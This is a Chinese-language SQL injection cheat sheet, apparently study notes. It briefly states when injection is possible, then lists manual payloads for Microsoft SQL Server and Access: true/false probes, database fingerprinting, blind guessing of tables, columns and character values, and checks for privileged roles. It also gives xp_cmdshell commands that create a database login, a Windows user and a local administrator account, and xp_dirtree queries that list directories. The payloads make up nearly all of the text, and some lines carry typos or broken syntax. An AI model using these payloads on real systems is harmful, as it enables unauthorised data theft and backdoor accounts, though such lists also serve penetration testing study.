sql注入产生的条件:
- 用户能够控制输入
- 原本程序执行的语句拼接了用户输入的数据
sql注入实质
通过把sql命令插入到web表单提交或者输入域名或页面请求的查询字符串,最终达到七篇服务器执行恶意sql命令
手工注入
判断是否有注入
;and 1=1
;and 1=2
初步判断是否是mssql (微软的SQL Server数据库服务器)
;and user > 0
判断数据库系统
;and (select count(*) from sysobjects) > 0 mssql
;and (select count(*) from msysobjects) > 0 access
注入参数是字符
'and [查询条件] and "='
搜索时没有过滤参数的
'and [查询条件] and '%25'='
猜数据库
;and (select count(*) from [数据库铭]) > 0
猜字段
;and (select count(字段名) from [数据库名]) > 0
猜字段中记录长度
;and (select top 1 len(字段名) from [数据库名]) > 0
猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from [数据库名]) > 0
猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from [数据库]) > 0
测试权限结构(mssql)
;and 1 = (select IS_SRVROLEMEMBER('sysadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('serveradmin'));--
;and 1 = (select IS_SRVROLEMEMBER('setiupadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('securityadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('diskadmin'));--
;and 1 = (select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1 = (select IS_MEMBER('db_owner'));--
添加mssql和系统的账户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null , username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
遍历目录
;create table dirs(paths varchar(100),id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs) > 0
;and (select top 1 paths from dirs where paths not in ('上步得到的paths'))>)